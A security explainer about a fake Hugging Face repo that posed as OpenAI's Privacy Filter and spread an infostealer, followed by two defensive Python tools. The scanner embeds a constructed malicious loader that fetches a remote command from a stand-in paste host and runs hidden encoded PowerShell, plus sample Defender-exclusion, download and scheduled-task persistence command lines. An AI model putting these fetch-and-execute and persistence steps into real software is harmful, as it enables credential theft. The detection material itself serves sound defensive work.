Malicious model hits 244,000 downloads
- HiddenLayer said a fake Hugging Face repo, `Open-OSS/privacy-filter`, impersonated OpenAI's real Privacy Filter model and briefly hit the platform's trending list before removal. (hiddenlayer.com)
- The repo reportedly reached about 244,000 downloads and 667 likes in roughly 18 hours, with researchers suspecting the popularity signals were artificially inflated. (thehackernews.com)
- It matters because model hubs now look a lot like package registries, which means typosquatting, fake trust signals, and malware can ride developer workflows. (hiddenlayer.com)
A Hugging Face model page is supposed to feel like a boring piece of infrastructure. You grab weights, maybe copy a snippet, and move on. That trust is exactly what got abused here. A fake repository posing as OpenAI's new Privacy Filter model climbed to the top of Hugging Face's trending list, pulled in roughly 244,000 downloads, and turned out to be a malware delivery vehicle. (hiddenlayer.com)

### What was the fake repo?

The malicious repository was called `Open-OSS/privacy-filter`. (thehackernews.com) It was designed to look like OpenAI's legitimate `openai/privacy-filter` release, which OpenAI launched on April 22, 2026 as an open-weight model for detecting and redacting personally identifiable information in text. HiddenLayer said the fake page copied the real model card almost word for word, which is what made the lure work. (hiddenlayer.com)

### Why did people trust it?

Because it looked popular and official enough. Researchers said the fake repo reached Hugging Face's top trending spot within about 18 hours and showed around 244,000 downloads plus 667 likes before it was disabled. Some of those signals may have been botted, but the effect is the same: once a repo looks active, users start treating visibility as proof of legitimacy. (hiddenlayer.com)

### How did the malware actually get delivered?

Not through the model weights, but through the setup path around them. HiddenLayer said the README told users to clone the repo and run `start.bat` on Windows or `python loader.py` on Linux or macOS. That `loader.py` included decoy code so it looked like an ordinary model loader, then disabled SSL certificate verification, pulled a command from a public JSON paste service, and launched a PowerShell chain. Nothing in that sequence is needed to load a model; each step is there to fetch and run attacker-controlled instructions at runtime. (hiddenlayer.com)

### What did that payload do?

On Windows, it moved into classic infostealer behavior. HiddenLayer said later stages tried to elevate privileges, add Microsoft Defender exclusions, download another binary, and set persistence with a scheduled task.
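The two stages described above (a Python "loader" that fetches instructions at runtime and disables certificate checks, then a PowerShell chain that adds Defender exclusions and a scheduled task) are each easy to pattern-match before or after the fact. The scanner below is an added example written for this page; it is not HiddenLayer's tooling, and `SAMPLE_LOADER` and `SAMPLE_CMDLINES` are constructed to mirror the described behaviour rather than recovered from the real repo (the paste URL, file paths and task name are placeholders). It flags a helper script that you are about to run, and separately scores process command lines from a host that already ran one.

```python
"""Rule-based indicator scan for a model repo's helper script and for the
PowerShell command lines it spawns. Added example, not HiddenLayer's tooling.
The sample inputs are constructed; URL, paths and task name are placeholders."""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Rule:
    name: str
    severity: int        # 1 low, 2 medium, 3 high
    pattern: re.Pattern


# Evasion flags that have no business in a model loader: hidden window,
# execution-policy bypass, encoded command. \W+ lets the pattern match both a
# shell string and an argv list such as ["powershell", "-w", "hidden", ...].
PS_FLAGS = re.compile(
    r"powershell.*?(-enc\b|-EncodedCommand|-w(indowstyle)?\W+hidden|"
    r"-e(p|xecutionpolicy)\W+bypass)", re.I)

# Stage 1: things a script whose stated job is "load the weights" never needs.
LOADER_RULES = [
    Rule("ssl_verification_disabled", 3, re.compile(
        r"verify_mode\s*=\s*ssl\.CERT_NONE|check_hostname\s*=\s*False|"
        r"_create_unverified_context|verify\s*=\s*False")),
    Rule("runtime_remote_fetch", 2, re.compile(
        r"urllib\.request\.urlopen|requests\.(get|post)\(|http\.client\.")),
    Rule("dynamic_code_execution", 3, re.compile(
        r"\b(exec|eval)\s*\(|base64\.b64decode")),
    Rule("shell_spawn", 2, re.compile(
        r"subprocess\.(run|Popen|call|check_output)|os\.system\(")),
    Rule("powershell_evasion_flags", 3, PS_FLAGS),
]

# Stage 2: the post-exploitation steps the page describes, as process command lines.
CMDLINE_RULES = [
    Rule("powershell_evasion_flags", 3, PS_FLAGS),
    Rule("defender_exclusion_added", 3, re.compile(
        r"Add-MpPreference\s+-Exclusion(Path|Process|Extension)", re.I)),
    Rule("download_cradle", 2, re.compile(
        r"Invoke-WebRequest|\biwr\b|DownloadFile|DownloadString|"
        r"Start-BitsTransfer|certutil.*-urlcache", re.I)),
    Rule("scheduled_task_persistence", 3, re.compile(
        r"schtasks(\.exe)?\s+/create|Register-ScheduledTask", re.I)),
    Rule("uac_elevation_attempt", 2, re.compile(
        r"Start-Process\b.*-Verb\s+RunAs", re.I)),
]


def scan(lines, rules):
    """Map rule name -> 1-based line numbers on which that rule fired."""
    hits = {}
    for n, line in enumerate(lines, 1):
        for rule in rules:
            if rule.pattern.search(line):
                hits.setdefault(rule.name, []).append(n)
    return hits


def verdict(hits, rules):
    """Sum the severity of each distinct rule that fired. One high-severity
    indicator, or two medium ones, blocks; a lone medium hit (a subprocess
    call, say) only sends the script for review."""
    severity = {r.name: r.severity for r in rules}
    score = sum(severity[name] for name in hits)
    return "block" if score >= 3 else ("review" if score else "clean")


def scan_loader(source):
    return scan(source.splitlines(), LOADER_RULES)


def scan_cmdlines(cmdlines):
    return scan(cmdlines, CMDLINE_RULES)


# Constructed sample: decoy pipeline code on top, the real work underneath.
SAMPLE_LOADER = r'''
import json, ssl, subprocess, urllib.request
from transformers import pipeline   # decoy: reads like a normal loader

def load_filter():
    return pipeline("token-classification", model="Open-OSS/privacy-filter")

ctx = ssl.create_default_context()
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
cfg = json.loads(urllib.request.urlopen("https://paste.example/raw/abc123", context=ctx).read())
subprocess.Popen(["powershell", "-w", "hidden", "-ep", "bypass", "-enc", cfg["cmd"]])
'''

# Constructed sample process command lines; the last one is benign.
SAMPLE_CMDLINES = [
    r"powershell.exe -w hidden -ep bypass -enc SQBFAFgAIAAoAE4A",
    r"powershell.exe Add-MpPreference -ExclusionPath C:\Users\Public\svc",
    r"powershell.exe Invoke-WebRequest https://cdn.example/svc.exe -OutFile C:\Users\Public\svc\svc.exe",
    r"schtasks.exe /create /sc onlogon /tn SvcUpdate /tr C:\Users\Public\svc\svc.exe /f",
    r"powershell.exe Get-Date",
]

if __name__ == "__main__":
    for label, hits, rules in (("loader.py", scan_loader(SAMPLE_LOADER), LOADER_RULES),
                               ("cmdlines", scan_cmdlines(SAMPLE_CMDLINES), CMDLINE_RULES)):
        print(label, verdict(hits, rules), hits)
```

The rules are deliberately narrow: a loader that only imports `transformers` and calls `pipeline()` scores clean, while the constructed sample trips four of the five loader rules. On the host side, the same scoring over Sysmon or EDR process-creation events would surface the Defender-exclusion and `schtasks /create` steps regardless of what the final binary was called.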
The final malware targeted browser credentials, session cookies, Discord tokens, crypto wallets, SSH keys, FTP credentials, VPN data, and other sensitive files. (thehackernews.com)

### Was every platform equally exposed?

No. Windows users were in the blast radius for the full infostealer chain. HiddenLayer's write-up focused its "treat the system as fully compromised" guidance on Windows hosts that executed the repo's scripts. That said, the cross-platform install instructions were part of the social engineering: they made the project feel like a normal developer tool instead of a trap. And because `loader.py` fetched its instructions from a remote paste at runtime, a Linux or macOS host that ran it still executed attacker-controlled code, even if the documented payload chain was Windows-only; those hosts deserve a review rather than a presumption of innocence. (hiddenlayer.com)

### Why is this a bigger deal than one bad repo?

Because AI model hubs are starting to inherit the same supply-chain problems that hit PyPI, npm, and GitHub. The attack did not need a zero-day. It needed a trusted brand name, a copied README, and enough fake engagement to get surfaced by recommendation systems. CSO had already flagged similar risks around poisoned model files and AI supply-chain abuse well before this incident. (hiddenlayer.com)

### What should users do differently now?

Treat model repos like executable software, not like passive downloads. Check the publisher namespace carefully: `openai/privacy-filter` and `Open-OSS/privacy-filter` are different publishers, and a matching model name proves nothing. Prefer links from the vendor's own announcement page rather than hub search or the trending list. Be suspicious of repos that ask you to run helper scripts before you understand what they do, and read any `loader.py` or `start.bat` before executing it. And if a machine ran this fake repo on Windows, HiddenLayer's advice was blunt: isolate it, reimage it, and rotate essentially every credential that touched that box. (hiddenlayer.com)

### Bottom line

The scary part is not just the malware. It's how ordinary the lure was. A copied model card, a trusted brand, and a trending badge were enough to turn an AI repository into a supply-chain attack. (hiddenlayer.com) (csoonline.com)
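The namespace check recommended above can be automated as a gate in front of `snapshot_download` or `from_pretrained`. The function below is an added example for this page, not Hugging Face or HiddenLayer code; `TRUSTED` is a constructed illustration of a vendor allowlist you would populate from the vendor's own announcement page, never from hub search. The logic generalizes slightly beyond this incident: it also catches lookalike namespaces (`0penai`, `openai-official`) that do not happen to reuse a vendor's model name.

```python
"""Pre-download gate for Hugging Face-style repo ids. Added example; not
Hugging Face or HiddenLayer code. TRUSTED is a constructed allowlist, meant
to be filled from vendor announcements rather than from the hub itself."""
import difflib
import re

# Constructed: verified namespace -> model names the vendor publishes there.
TRUSTED = {
    "openai": {"privacy-filter"},
    "meta-llama": {"Llama-3.1-8B"},
}

# Lookalike threshold: 0.8 catches single-character swaps in short vendor
# names ("0penai" vs "openai" scores 0.83) without flagging unrelated names.
LOOKALIKE_RATIO = 0.8


def _norm(s):
    """Fold case and drop separators so 'Open-OSS' and 'openoss' compare alike."""
    return re.sub(r"[^a-z0-9]", "", s.lower())


def check_repo_id(repo_id, trusted=TRUSTED):
    """Return (verdict, reason). verdict is 'allow', 'review' or 'reject'."""
    if repo_id.count("/") != 1:
        return ("reject", "repo id must be <namespace>/<model>")
    ns, model = repo_id.split("/")

    # Namespace comparison is exact on purpose: the vendor's spelling is the
    # only thing the allowlist vouches for. Anything else is unverified.
    if ns in trusted:
        if model in trusted[ns]:
            return ("allow", f"{ns} is a verified namespace and {model} is on its list")
        return ("review", f"{ns} is verified but {model} is not on the vendor's list")

    for vendor, models in trusted.items():
        # Same model name under a different publisher is the pattern this
        # incident used: treat it as impersonation, not as a coincidence.
        if any(_norm(model) == _norm(m) for m in models):
            return ("reject",
                    f"model name matches {vendor}/{model} but namespace is {ns}: impersonation")
        # Lookalike namespace, with or without a borrowed model name.
        ratio = difflib.SequenceMatcher(None, _norm(ns), _norm(vendor)).ratio()
        if ratio >= LOOKALIKE_RATIO or _norm(vendor) in _norm(ns):
            return ("reject", f"namespace {ns} looks like {vendor} (similarity {ratio:.2f})")

    return ("review", f"{ns} is not a verified namespace; treat its scripts as untrusted code")


if __name__ == "__main__":
    for rid in ("openai/privacy-filter", "Open-OSS/privacy-filter",
                "0penai/some-other-model", "some-lab/bert-finetune"):
        print(rid, "->", check_repo_id(rid))
```

Wire the `allow` verdict to the actual download and send `review` to a human; `reject` should fail closed. Note what this does not do: it says nothing about the repo's contents, so a verified namespace with an unexpected model name still goes to review, and a helper script inside any repo still needs to be read before it is run.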